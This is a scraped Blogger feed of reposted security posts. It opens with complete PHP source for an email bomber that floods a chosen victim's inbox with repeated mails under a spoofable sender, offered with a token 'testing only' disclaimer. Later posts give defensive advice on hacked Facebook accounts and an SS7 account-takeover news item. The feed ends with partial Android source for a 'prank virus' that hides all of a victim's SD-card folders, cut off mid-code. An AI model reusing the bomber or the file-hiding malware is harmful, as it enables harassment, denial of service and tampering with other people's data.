tag:blogger.com,1999:blog-45898654376379648142024-03-12T16:54:46.592-07:00MODULE ONLINEModule Online for Learning, Module Online for IntroductionSmarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.comBlogger60125tag:blogger.com,1999:blog-4589865437637964814.post-53916305593034664062018-04-19T06:22:00.002-07:002018-04-19T06:23:52.413-07:00Simple Web Email Bomber. [PHP Source Code]This Code was written due to lots of request from members in worldofhacker<br /><br />This is Only for Testing Purpose, if you try to harm person with this S*** of code than I(Module Online) or World of Hacker will not be Responsible for your Crime. Keep Calm, Stay Safe<br /><br /><div style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnzP6m6L9ZfHB-8BXpypyZqGikNc2dDwKfIolkr1Pr6wUI2jspgYBLgoTQDBAE5s3u6kex3Br5IfMiwS2SNM_Ox4CTosXeG7zqVG6Ows-tKRy6ObV6Q49iBpcjUEkMfg-qDofEQVWafdwz/s200/SMS-Bomber-Icon.png" /></div>
<br />Note: Your Host will ban you account for doing so.<br /><br /><div class="codeblock phpcodeblock" style="border-radius: 3px; border: 1px solid rgb(196, 233, 255); line-height: 18px; padding: 4px;">
<div class="title" style="border-bottom: 1px solid rgb(204, 204, 204); margin: 4px 0px;">
PHP Code:</div>
<div class="body" style="background-color: #ecf8ff; font-family: verdana, arial, sans-serif; font-size: 13px;">
<div dir="ltr">
<code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow: auto;"><span style="color: #007700;"><!</span><span style="color: #0000bb;">DOCTYPE html</span><span style="color: #007700;">><br /><</span><span style="color: #0000bb;">html lang</span><span style="color: #007700;">=</span><span style="color: #0000bb;">en</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">head</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">title</span><span style="color: #007700;">></span><span style="color: #0000bb;">My Email Bomber</span><span style="color: #007700;"></</span><span style="color: #0000bb;">title</span><span style="color: #007700;">><br /> </</span><span style="color: #0000bb;">head</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">body</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">header align</span><span style="color: #007700;">=</span><span style="color: #0000bb;">center</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">h1</span><span style="color: #007700;">> </span><span style="color: #0000bb;">My Email Bomber </span><span style="color: #007700;"></</span><span style="color: #0000bb;">h1</span><span style="color: #007700;">><br /> </</span><span style="color: #0000bb;">header</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">section</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">form method</span><span style="color: #007700;">=</span><span style="color: #dd0000;">"post" </span><span style="color: #0000bb;">action</span><span style="color: #007700;">=</span><span style="color: #dd0000;">"#"</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">table border</span><span style="color: #007700;">=</span><span style="color: #dd0000;">"0"</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">tr</span><span style="color: #007700;">><</span><span style="color: #0000bb;">td</span><span style="color: #007700;">></span><span style="color: #0000bb;">Your EMail </span><span style="color: #007700;">: </</span><span style="color: #0000bb;">td</span><span style="color: #007700;">><</span><span style="color: #0000bb;">td</span><span style="color: #007700;">><</span><span style="color: #0000bb;">input type</span><span style="color: #007700;">=</span><span style="color: #0000bb;">email name</span><span style="color: #007700;">=</span><span style="color: #0000bb;">email placeholder</span><span style="color: #007700;">=</span><span style="color: #dd0000;">"Your Mail id If you want to show victime" </span><span style="color: #007700;">/></</span><span style="color: #0000bb;">td</span><span style="color: #007700;">></</span><span style="color: #0000bb;">tr</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">tr</span><span style="color: #007700;">><</span><span style="color: #0000bb;">td</span><span style="color: #007700;">></span><span style="color: #0000bb;">Email id of Person</span><span style="color: #007700;">: </</span><span style="color: #0000bb;">td</span><span style="color: #007700;">><</span><span style="color: #0000bb;">td</span><span style="color: #007700;">><</span><span style="color: #0000bb;">input type</span><span style="color: #007700;">=</span><span style="color: #0000bb;">email name</span><span style="color: #007700;">=</span><span style="color: #0000bb;">mail placeholder</span><span style="color: #007700;">=</span><span style="color: #dd0000;">"Enter Slave Email" </span><span style="color: #007700;">/></</span><span style="color: #0000bb;">td</span><span style="color: #007700;">></</span><span style="color: #0000bb;">tr</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">tr</span><span style="color: #007700;">><</span><span style="color: #0000bb;">td valign</span><span style="color: #007700;">=</span><span style="color: #0000bb;">top</span><span style="color: #007700;">></span><span style="color: #0000bb;">Message to Slave </span><span style="color: #007700;">: </</span><span style="color: #0000bb;">td</span><span style="color: #007700;">><</span><span style="color: #0000bb;">td</span><span style="color: #007700;">><</span><span style="color: #0000bb;">textarea name</span><span style="color: #007700;">=</span><span style="color: #0000bb;">msg rows</span><span style="color: #007700;">=</span><span style="color: #0000bb;">8 cols</span><span style="color: #007700;">=</span><span style="color: #0000bb;">30 </span><span style="color: #007700;">></</span><span style="color: #0000bb;">textarea</span><span style="color: #007700;">></</span><span style="color: #0000bb;">td</span><span style="color: #007700;">></</span><span style="color: #0000bb;">tr</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">tr</span><span style="color: #007700;">><</span><span style="color: #0000bb;">td</span><span style="color: #007700;">></span><span style="color: #0000bb;">No</span><span style="color: #007700;">. </span><span style="color: #0000bb;">of Time You want to Bombard his Email</span><span style="color: #007700;"></</span><span style="color: #0000bb;">td</span><span style="color: #007700;">><</span><span style="color: #0000bb;">td</span><span style="color: #007700;">><</span><span style="color: #0000bb;">input type</span><span style="color: #007700;">=</span><span style="color: #0000bb;">text name</span><span style="color: #007700;">=</span><span style="color: #0000bb;">no placeholder</span><span style="color: #007700;">=</span><span style="color: #0000bb;">100 </span><span style="color: #007700;">/></</span><span style="color: #0000bb;">td</span><span style="color: #007700;">></</span><span style="color: #0000bb;">tr</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">tr</span><span style="color: #007700;">><</span><span style="color: #0000bb;">td</span><span style="color: #007700;">><</span><span style="color: #0000bb;">input type</span><span style="color: #007700;">=</span><span style="color: #0000bb;">reset value</span><span style="color: #007700;">=</span><span style="color: #0000bb;">Reset All </span><span style="color: #007700;">/></</span><span style="color: #0000bb;">td</span><span style="color: #007700;">><</span><span style="color: #0000bb;">td</span><span style="color: #007700;">><</span><span style="color: #0000bb;">input type</span><span style="color: #007700;">=</span><span style="color: #0000bb;">submit name</span><span style="color: #007700;">=</span><span style="color: #0000bb;">sub value</span><span style="color: #007700;">=</span><span style="color: #dd0000;">"Start Bombarding Mail" </span><span style="color: #007700;">/></</span><span style="color: #0000bb;">td</span><span style="color: #007700;">></</span><span style="color: #0000bb;">tr</span><span style="color: #007700;">><br /> </</span><span style="color: #0000bb;">table</span><span style="color: #007700;">><br /> </</span><span style="color: #0000bb;">form</span><span style="color: #007700;">><br /> </</span><span style="color: #0000bb;">section</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">footer align</span><span style="color: #007700;">=</span><span style="color: #0000bb;">center</span><span style="color: #007700;">><br /> <</span><span style="color: #0000bb;">p</span><span style="color: #007700;">></span><span style="color: #0000bb;">Thank you to </span><span style="color: #007700;"><</span><span style="color: #0000bb;">a href</span><span style="color: #007700;">=</span><span style="color: #dd0000;">"http://worldofhacker.com" </span><span style="color: #0000bb;">target</span><span style="color: #007700;">=</span><span style="color: #dd0000;">"_blank"</span><span style="color: #007700;">></span><span style="color: #0000bb;">World of Hacker</span><span style="color: #007700;"></</span><span style="color: #0000bb;">a</span><span style="color: #007700;">> </span><span style="color: #0000bb;">Copyright </span><span style="color: #007700;">&</span><span style="color: #0000bb;">copy</span><span style="color: #007700;">; <</span><span style="color: #0000bb;">a href</span><span style="color: #007700;">=</span><span style="color: #dd0000;">"http://www.worldofhacker.com"</span><span style="color: #007700;">></span><span style="color: #0000bb;">KroKite</span><span style="color: #007700;"></</span><span style="color: #0000bb;">a</span><span style="color: #007700;">></</span><span style="color: #0000bb;">p</span><span style="color: #007700;">><br /> </</span><span style="color: #0000bb;">footer</span><span style="color: #007700;">><br /> </</span><span style="color: #0000bb;">body</span><span style="color: #007700;">><br /></</span><span style="color: #0000bb;">html</span><span style="color: #007700;">><br /><br /><span style="color: #0000bb;">php</span><span style="color: #007700;">if(isset(</span><span style="color: #0000bb;">$_POST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'sub'</span><span style="color: #007700;">]) || !empty(</span><span style="color: #0000bb;">$_POST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'mail'</span><span style="color: #007700;">]) || !empty(</span><span style="color: #0000bb;">$_POST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'no'</span><span style="color: #007700;">])) {<br /> </span><span style="color: #0000bb;">$Slave </span><span style="color: #007700;">= </span><span style="color: #0000bb;">$_POST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'mail'</span><span style="color: #007700;">];<br /> </span><span style="color: #0000bb;">$no </span><span style="color: #007700;">= </span><span style="color: #0000bb;">$_POST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'no'</span><span style="color: #007700;">];<br /> </span><span style="color: #0000bb;">$msg </span><span style="color: #007700;">= </span><span style="color: #0000bb;">$_POST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'msg'</span><span style="color: #007700;">];<br /> </span><span style="color: #0000bb;">$hack </span><span style="color: #007700;">= </span><span style="color: #dd0000;">"hacker@anonymous.com"</span><span style="color: #007700;">;<br /> </span><span style="color: #0000bb;">$headers </span><span style="color: #007700;">= </span><span style="color: #dd0000;">'From:'</span><span style="color: #007700;">.(!empty(</span><span style="color: #0000bb;">$_POST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'email'</span><span style="color: #007700;">])) ? </span><span style="color: #0000bb;">$_POST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'email'</span><span style="color: #007700;">]:</span><span style="color: #0000bb;">$hack </span><span style="color: #007700;">. </span><span style="color: #dd0000;">"\r\n" </span><span style="color: #007700;">.<br /> </span><span style="color: #dd0000;">'Reply-To:'</span><span style="color: #007700;">.(!empty(</span><span style="color: #0000bb;">$_POST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'email'</span><span style="color: #007700;">])) ? </span><span style="color: #0000bb;">$_POST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'email'</span><span style="color: #007700;">]:</span><span style="color: #0000bb;">$hack </span><span style="color: #007700;">. </span><span style="color: #dd0000;">"\r\n" </span><span style="color: #007700;">.<br /> </span><span style="color: #dd0000;">'X-Mailer: PHP/' </span><span style="color: #007700;">. </span><span style="color: #0000bb;">phpversion</span><span style="color: #007700;">();<br /> for(</span><span style="color: #0000bb;">$i</span><span style="color: #007700;">=</span><span style="color: #0000bb;">1</span><span style="color: #007700;">;</span><span style="color: #0000bb;">$i</span><span style="color: #007700;"><=</span><span style="color: #0000bb;">$no</span><span style="color: #007700;">;</span><span style="color: #0000bb;">$i</span><span style="color: #007700;">++) {<br /> </span><span style="color: #0000bb;">$mail </span><span style="color: #007700;">= </span><span style="color: #0000bb;">mail</span><span style="color: #007700;">(</span><span style="color: #0000bb;">$Slave</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"You are Under Attack"</span><span style="color: #007700;">, </span><span style="color: #0000bb;">$msg</span><span style="color: #007700;">, </span><span style="color: #0000bb;">$headers</span><span style="color: #007700;">);<br /> if(</span><span style="color: #0000bb;">$mail</span><span style="color: #007700;">) {<br /> echo </span><span style="color: #dd0000;">"</span><span style="color: #007700;">{</span><span style="color: #0000bb;">$i</span><span style="color: #007700;">}</span><span style="color: #dd0000;">. Mail Sent<br nbsp="" />"</span><span style="color: #007700;">;<br /> } else {<br /> echo </span><span style="color: #dd0000;">"</span><span style="color: #007700;">{</span><span style="color: #0000bb;">$i</span><span style="color: #007700;">}</span><span style="color: #dd0000;">. Mail was not Sent<br nbsp="" />"</span><span style="color: #007700;">;<br /> }<br /> }<br />} else {<br /> echo </span><span style="color: #dd0000;">"Please fill all the form Properly"</span><span style="color: #007700;">;<br />}</span><span style="color: #0000bb;">?></span></span></code></div>
</div>
</div>
<br />
Good Luck.<br /><br /><br />
<br />
<span style="font-size: x-small;">Source : Copyed on April 19, 2018 at Krokite.blogspot.co.id Posted by Krokite</span><br />
<span style="font-size: x-small;"> As an advanced reference material, please be able to visit the official website. Thank you</span>Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com2tag:blogger.com,1999:blog-4589865437637964814.post-62963971708795571372018-04-19T03:21:00.001-07:002018-04-19T03:26:16.868-07:005 Signs of a Hacked Social Media Account<div style="text-align: center;">
<img height="188" src="https://blog.avira.com/wp-content/uploads/2014/11/social-media-account-hacked-750x354.jpg?x69254" width="400" /></div>
<br /><span style="font-size: large;">1. Posts that you didn’t write appear suddenly on your wall !</span><br /><br />Sounds obvious – right? But can you always tell? For instance, if several bloggers contribute posts to the same account, will you know who was supposed to post which article and when? And if you use a service like NetworkedBlogs to automatically publish links from your blog to your Twitter and Facebook accounts, do you really carefully check every tweet and post?<br /><br /><i>Recommendation:</i><br /><br />If you notice unexpected posts on your social media accounts, delete them immediately and change your password.<br /><br /><span style="font-size: large;">2. Somebody logged into your account from an unusual location</span><br /><br />Most social media services these days enable you to check the location of the last logins – even if they tend to be approximate. So if you are in Germany and you see that someone logged in on a different continent, chances are your account was hacked.<br /><br /><i>Recommendation:</i><br /><br />Regularly check the locations where you supposedly logged in. If you notice an open session in an unexpected location, terminate it. A step-by-step guide on how to do that in Facebook can be found here.<br /><br /><span style="font-size: large;">3. Spammy ads flood your Facebook page</span><br /><br />Ever heard of likejacking? It is a derivative of “clickjacking”, but specific to Facebook. It works as follows: you are lured onto a page with an attractive post, such as the “10 funniest television bloopers” or “watch this baby panda sneeze”. The page is composed of two layers – a front layer, which is a cute sneezing panda, and a back layer, with a Facebook “Like” button, which follows your cursor wherever you click. As soon as you do so, you’re Facebook page will get flooded with ads…<br /><br /><i>Recommendation:</i><br /><br />On Facebook you have the ability to check which apps you have liked and can disable them. If you don’t know the apps that you find there, remove them from your profile – a hacker may have liked them to get money for every purchase made form those ads. Make sure that their posts are also gone.<br /><br /><span style="font-size: large;">4. You are unable to login to your account</span><br /><br />Assuming that you didn’t simply forget your password, it might be that someone accessed your account and changed your password. Please note that if this is indeed the case, most probably the cyber criminals have also replaced the email address used to recover the password.<br /><br /><i>Recommendation:</i><br />Contact the owner of the platform (e.g.: Facebook, Twitter) – it’s the best way to claim your account back.<br /><br /><span style="font-size: large;">5. You’re suddenly following a lot of new, unknown people</span><br /><br />Are you now following lots of new and unknown people? For example, malware may hijack your account and make you follow spambots on Twitter or Facebook. This then further spreads malicious URLs to more people. The same applies for a host of private messages/tweets sent from your account – unbeknown to you.<br /><br /><i>Recommendation:</i><br /><br />Change your password immediately. Optionally, we recommend you delete the posts and let everyone know that they should not click on the links posted from your account during the period of time when you were hacked.<br /><br /><br /><br /><span style="font-size: x-small;">Source : Copyed on April 19, 2018 at Blog.avira.com Posted by Avira<br /> As an advanced reference material, please be able to visit the official website. Thank you</span>Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com2tag:blogger.com,1999:blog-4589865437637964814.post-88527949230076662032018-04-19T03:12:00.002-07:002018-04-19T03:13:29.842-07:00How to Hack Facebook Account Just by Knowing Phone Number<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3b0GO_tJ1WyP_LeMel6tWllp6Qlhz6oGlSTwpYtmOmCDjzQWyEUeVVRcaTcUQ5xJ2gRT11owNPTtuA_DoDx-_Z3lc2uKbAy6IjPm2p4gwJ3K-2uZgiAUcP_Bo73nXd20BdHHylC8YFUUz/s1600-e20/how-to-hack-facebook-account.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="380" data-original-width="728" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3b0GO_tJ1WyP_LeMel6tWllp6Qlhz6oGlSTwpYtmOmCDjzQWyEUeVVRcaTcUQ5xJ2gRT11owNPTtuA_DoDx-_Z3lc2uKbAy6IjPm2p4gwJ3K-2uZgiAUcP_Bo73nXd20BdHHylC8YFUUz/s1600-e20/how-to-hack-facebook-account.png" width="320" /></a></div>
<br />
<b>Update:</b> If you think this technique is old and can not be used to hack your social media, bank or any online accounts, then you are mistaken. A real-world SS7 attack has been spotted this month when some unknown hackers exploited the design flaws in the Signaling System 7 (SS7) to drain victims' bank accounts.<br />
<br />
Hacking Facebook account is one of the major queries on the Internet today. It's hard to find — how to hack Facebook account, but researchers have just proven by taking control of a Facebook account with only the target's phone number and some hacking skills.<br />
<br />
Yes, your Facebook account can be hacked, no matter how strong your password is or how much extra security measures you have taken. No joke!<br />
<br />
Hackers with skills to exploit the SS7 network can hack your Facebook account. All they need is your phone number.<br />
<br />
The weaknesses in the part of global telecom network SS7 not only let hackers and spy agencies listen to personal phone calls and intercept SMSes on a potentially massive scale but also let them hijack social media accounts to which you have provided your phone number.<br />
<br />
SS7 or Signalling System Number 7 is a telephony signaling protocol that is being used by more than 800 telecommunication operators worldwide to exchange information with one another, cross-carrier billing, enabling roaming, and other features.<br />
<br />
However, an issue with the SS7 network is that it trusts text messages sent over it regardless of their origin. So, malicious hackers could trick SS7 into diverting text messages as well as calls to their own devices.<br />
<br />
All they need is the target’s phone number and some details of the target’s device to initiate the silent snooping.<br />
<br />
The researchers from Positive Technologies, who recently showed how they could hijack WhatsApp and Telegram accounts, now gave the demonstration of the Facebook hack using similar tricks, Forbes reported.<br />
<br />
SS7 has long been known to be vulnerable, despite the most advanced encryption used by cellular networks. The designing flaws in SS7 have been in circulation since 2014 when the team of researchers at German Security Research Labs alerted the world to it.<br />
<br />
<span style="font-size: large;"><b>Here's How to Hack Any Facebook Account:</b></span><br />
<br />
The attacker first needs to click on the "Forgot account?" link on the Facebook.com homepage. Now, when asked for a phone number or email address linked to the target account, the hacker needs to provide the legitimate phone number.<br />
<br />
The attacker then diverts the SMS containing a one-time passcode (OTP) to their own computer or phone, and can login to the target’s Facebook account.<br />
<br />
<div>
<div>
The issue affects all Facebook users who have registered a phone number with Facebook and have authorized Facebook Texts.</div>
<div>
<br /></div>
<div>
Besides Facebook, researchers' work shows that any service, including Gmail and Twitter, that uses SMS to verify its user accounts has left open doors for hackers to target its customers.</div>
<div>
<br /></div>
<div>
Although the network operators are unable to patch the hole sometime soon, there is little the smartphone users can do.</div>
<div>
<ul>
<li>Do not link your phone number to social media sites, rather rely solely on emails to recover your Facebook or other social media accounts.</li>
<li>Use two-factor authentication that does not use SMS texts for receiving codes.</li>
<li>Use communication apps that offer "end-to-end encryption" to encrypt your data before it leaves your smartphone over your phone's standard calling feature.</li>
</ul>
</div>
<div>
<b>Update:</b> However, the important thing to note is that the issue has actually nothing to do with Facebook security or other website's security, instead it is the weakness in the telecom network.</div>
<div>
</div>
<div>
"Because this technique [SSL exploitation] requires significant technical and financial investment, it is a very low risk for most people," Facebook spokesperson told The Hacker News. </div>
<div>
<br /></div>
<div>
"As an added precaution, we recommend turning on two-factor authentication, called Login Approvals, in your Facebook security settings. Doing this will disable recovery via SMS on your account so even if someone has your phone number, they'll still need your password to access your account."</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-size: x-small;">Source : Copyed on April 19, 2018 at T</span><span style="font-size: x-small;">hehackernews.com</span><span style="font-size: x-small;"> Posted by Swati Khandelwal</span><br />
<span style="font-size: x-small;"> As an advanced reference material, please be able to visit the official website. Thank you</span></div>
Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-18156976149411022522018-04-18T21:04:00.001-07:002018-04-18T21:04:36.693-07:005 Ways To Prevent Your Facebook Account From Getting Hacked<div style="text-align: center;">
<a href="http://thedigitalbakery.ie/blog/" target="_blank"><img alt="Related image" src="http://thedigitalbakery.ie/wp-content/uploads/2018/03/FSecurity.png" height="144" width="320" /></a></div>
<br />
You’ve probably already heard that Facebook accounts are hacked to gain personal information, but you might not be aware of how easy that just might be for hackers. With hackers increasingly targeting Facebook as a primary source of collecting user information, and corporations using your information to make decisions about your rates, you really should have a plan for protecting yourself.<br />
<br />
Here are some tips to prevent getting hacked:<br />
<br />
<ol>
<li><b>Use strong passwords</b>. The names of yourself, your spouse, parents, siblings or dog, or your birthday, do not qualify. Use a mix of letters, digits and punctuation (but not blank spaces). Use both capital and lowercase letters. The longer your password, the better. The shorter your password, the easier it is to hack, especially if it’s a common word or name. A good starting point is six characters, though 8, 10 or 12 are even better. If you have trouble remembering, do something about that, else consider using an unusual phrase or combo of words that only you or a few people might know, then substitute some of the letters with digits and/or punctuation. Humorous combinations might make it easier to remember, but otherwise write your password down in a SAFE place. Or just keep using the “Forgot password?” option to reset your password.</li>
<li><b>Change your password regularly</b>. By regularly I mean monthly or even weekly, not yearly. Facebook’s “Forgot password?” option is one way, or you can go to your account’s settings.</li>
<li><b>Don’t friend everyone</b>. That “hot chick” whom you don’t know and looks like some Hollywood starlet might be a guy. Avoid the person who doesn’t even have a profile pic, let alone any friends in common with you. If you haven’t met them, be cautious. Also, don’t friend friends whom you know to use weak passwords. If their account is compromised, hackers can still learn certain things about you from your profile, or could send you a message via the friend’s account to lure you to a malware site.</li>
<li><b>Don’t click on links willy-nilly</b>. If you click on a status update that a “friend” posted on your wall and it looks fishy, don’t assume they actually did it. Their account could be compromised. If your clicking takes you to a Facebook application that you’re unsure of, there’s no obligation to click through.</li>
<li><b>Don’t believe all emails</b>. Don’t forget that honest web services will never ask you to do certain things in an email. For example, Facebook will NEVER send you an email asking you to change your password or enter personal details. If they need you to do that, they will tell you where in your account settings you can go to do that. On a similar note, protect your email account that you registered for Facebook with, else someone can succeed in resetting your Facebook password.</li>
</ol>
<br />
Have any tips on how to protect a Facebook account? Feel free to share in the comments.<br />
<br />
<br />
<span style="font-size: x-small;">Source : Copyed on April 19, 2018 at </span><span style="font-size: x-small;">www.adweek.com</span><span style="font-size: x-small;"> Posted by Raj Dash</span><br />
<span style="font-size: x-small;"> As an advanced reference material, please be able to visit the official website. Thank you</span>Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com2tag:blogger.com,1999:blog-4589865437637964814.post-82188158078210374992018-04-18T20:14:00.003-07:002018-04-18T20:14:47.466-07:00Protect Your Facebook Account From HackersRecently a friend-of-a-friend’s Facebook account was hacked. She realized that spam e-mails were sent from her account. Then a few days later I heard that another acquaintance experienced the same problem.<br />
<br />
Here are some steps you can take if you believe your account has been compromised, along with some steps to prevent this from happening. Please share this with your Facebooking teens. A 2011 survey showed that 30% of teen’s accounts had been hacked – by a friend! So help them check their privacy and security settings on a regular basis.<br />
<br />
<br />
<b><span style="font-size: large;">WHAT TO DO IF YOUR FACEBOOK ACCOUNT HAS BEEN HACKED</span></b><br />
<br />
Go to <a href="https://www.facebook.com/hacked" target="_blank">https://www.facebook.com/hacked</a> and follow the instructions on-screen. You’ll go through three steps:<br />
<br />
<br />
<ol>
<li>Verify your account and change password. You’ll be asked to identify your account, change your password, and change the password associated with the e-mail account that you use for Facebook.</li>
<li>Review and fix anything the cybercriminal changed.</li>
<li>Unlock account.</li>
</ol>
<br />
<br />
<span style="font-size: large;"><b>HOW TO PREVENT YOUR FACEBOOK ACCOUNT FROM BEING HACKED</b></span><br />
<span style="font-size: large;"><br /></span>
Security settings are the key. So stop what you’re doing and print out this article. Then log into Facebook and update these settings.<br />
<br />
From Account settings, click on Security. I recommend the following settings for the highest level of security.<br />
<br />
1. <b>Secure Browsing</b> – enabled.<br />
<br />
2. <b>Login Notifications</b> – enabled.<br />
<br />
3. <b>Login Approvals</b> – enabled. This feature requires that you have a cell phone capable of receiving text messages. When enabled, you will receive a code via text message if your account is accessed from an unrecognized location.<br />
<br />
This is important for teens. They may use computers at a friend’s house, the library, or other public locations. As an example, if you are logging in to Facebook from a computer in the library, you’ll be asked to enter in a code. You’ll receive the text message, know that it’s YOU using Facebook, and enter the code. If you receive the text message and you WERE NOT trying to log into Facebook, you’ll know there is a problem. And the hacker trying to get into your account will not have the code.<br />
<br />
<img alt="Dialog box shown after Login Approvals are set up" src="http://www.bewebsmart.com/wp-content/uploads/2012/11/loginapprovals-300x178.gif" /><br />
<br />
4. <b>App Passwords</b> – If you don’t have many apps associated with your Facebook account, you can probably leave this off. If you do enable login approvals as described above, and you do use apps such as Skype through Facebook, then you may want to set app passwords. You can read about this feature on Facebook Help and Inside Facebook.<br />
<br />
5. <b>Recognized Devices</b> – if there is anything listed here that doesn’t look familiar, or the date is not recent, remove it.<br />
<br />
6. <b>Active Sessions</b> – remove all except Current session.<br />
<br />
<br />
Your Security Settings page should now look something like this:<br />
<br />
<img alt="Summary of Facebook security settings" src="http://www.bewebsmart.com/wp-content/uploads/2012/11/securitysettingsfb.gif" /><br />
<br />
As a last step, go to General Account settings and change your Facebook password. And finally, log out of Facebook when not in use.<br />
<br />
Now with your Facebook account safe and secure, you can get back to important Facebook activities, such as post-election re-friending, without too much of a fear of hackers accessing your account.<br />
<br />
<br />
<span style="font-size: x-small;">Source : Copyed on April 19, 2018 at </span><span style="font-size: x-small;">http://www.bewebsmart.com</span><span style="font-size: x-small;"> Posted by Jean</span><br />
<span style="font-size: x-small;"> As an advanced reference material, please be able to visit the official website. Thank you</span>Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com2tag:blogger.com,1999:blog-4589865437637964814.post-57866799294355608232018-04-18T01:47:00.004-07:002018-04-18T01:53:07.906-07:00How To Create A Harmless Android Phone Virus ... (prank ,virus, harmless)<b>Creating a simple virus program(harmless,just for fun / prank)....</b><br /><br />This program can infect the phone as well as disinfect it....<br /><br />(disinfecting will not function properly in some cases,data is not actually lost anywhere but you have to recover it manually in such case... **it is also described below)<br /><br />so use at own risk....<br /><br />Screen shot:-<br /><br /><div style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEMelvTBwWBRtBkDuhPqzst5knpYtNh-xWmlBVvmJcbzexC4LHLcbj03cAQiekTpSSK8BQKI_3ELEjuRODe75VlUv5fzbKg2BFaGdaWPSvp0MNb4FDGsGKmQFOxZZFYIzt7ahInJs-V7s/s200/vrs.png" /></div>
<br /><div style="text-align: center;">
After infecting</div>
<br /><div style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7iMuP3yahyphenhyphenYUingBLlGPiCzV-1-5yog_PV3qmldpv278A2rYXU97n20hKXjfkShWqCSKepGcGB3iz5dTXMjBAMRG5rOr5uMG_VPD-JHY28HyVgDwEJVszVEZqCecGcu_6FCPemtEgypY/s200/vrs2.png" /></div>
<br /><div style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj4Ali4Ch68jsGex3AHeTF6J5xR_S7VOyI5_YQ2rn9Ib8MVyPDxk3idI9JOSYfTXQ0xzh2g1_WBmQQAyrtWlhD3ov1j-Gr-pVpSFFECBV0D0g-G73XRY_gmB2zOoyxQZ-DeCkJEegvAoQ/s200/vrs3.png" /></div>
<br />but yet it works in most cases<br /><br />This posts include a simple program in android which is capable to invisible all the SD-Card content of phone from file manager,gallery and media scanner...<br /><br />The basic idea behind it is only to hide/invisible the SD-Card content from phone.so Android OS gets unaware about that data and don't shows it up.....<br /><br />In Android system folders having a dot "." as initial of its name considered as hidden .... so what we do is to make each SD-card folder to start with "..." to hide them ex- 'image' --> '...image'<br /><br />and while disinfecting we have to remove those dots to unhide them from system....<br /><br />here we are using three dots "..." as prefix to differ them from android system hidden files..<br /><br />Source code:-<br /><br /><span style="background-color: yellow;">package com.example.fun_virus;<br /><br /> import java.io.File;<br />import java.util.ArrayList;<br />import java.util.List;<br /><br /> import android.app.Activity;<br />import android.content.SharedPreferences;<br />import android.os.Bundle;<br />import android.os.Environment;<br />import android.util.Log;<br />import android.view.View;<br />import android.view.View.OnClickListener;<br />import android.widget.Button;<br />import android.widget.Toast;<br /><br /> public class Fun_Virus_Activity extends Activity <br />{<br />private File file;<br />private List myList;<br /><br /> public void onCreate(Bundle savedInstanceState) <br />{<br /> super.onCreate(savedInstanceState);<br /> setContentView(R.layout.activity_fun__virus);<br /><br /> myList = new ArrayList(); <br /><br /> String root_sd = Environment.getExternalStorageDirectory().toString();<br /> file = new File( root_sd + "/" ) ; <br /> Button btn_infect = (Button) findViewById(R.id.btn_infect);<br /> Button btn_disinfect = (Button) findViewById(R.id.btn_disinfect);<br /><br /> btn_infect.setOnClickListener(new OnClickListener() {<br /><br /> @Override<br /> public void onClick(View arg0) {<br /> // TODO Auto-generated method stub<br /> SharedPreferences settings = getSharedPreferences("mysp", MODE_PRIVATE);<br /> String inf = settings.getString("INFECTED","NO");<br /> if(inf.equals("OK"))<br /> {<br /> Toast.makeText(Fun_Virus_Activity.this,"Already Infected", 5).show();<br /> }else<br /> {<br /> infect();<br /> SharedPreferences.Editor prefEditor = settings.edit();<br /> prefEditor.putString("INFECTED", "OK");<br /> prefEditor.commit();<br /> }<br /> }<br /> });<br />btn_disinfect.setOnClickListener(new OnClickListener() {<br /><br /> @Override<br /> public void onClick(View arg0) {<br /> // TODO Auto-generated method stub<br /> disinfect();<br /> Fun_Virus_Activity.this.getSharedPreferences("mysp", 0).edit().clear().commit();<br /> }<br /> });<br /><br />} <br /> public void infect()<br /> {<br /> File list[] = file.listFiles();<br /> for( int i=0; i< list.length; i++)<br /> {<br /> myList.add( list[i].getName() );<br /> Log.e("files : ",i+":"+ myList.get(i).toString());<br /> File file = new File(list[i].getParent()+"/"+myList.get(i));<br /> //File file2 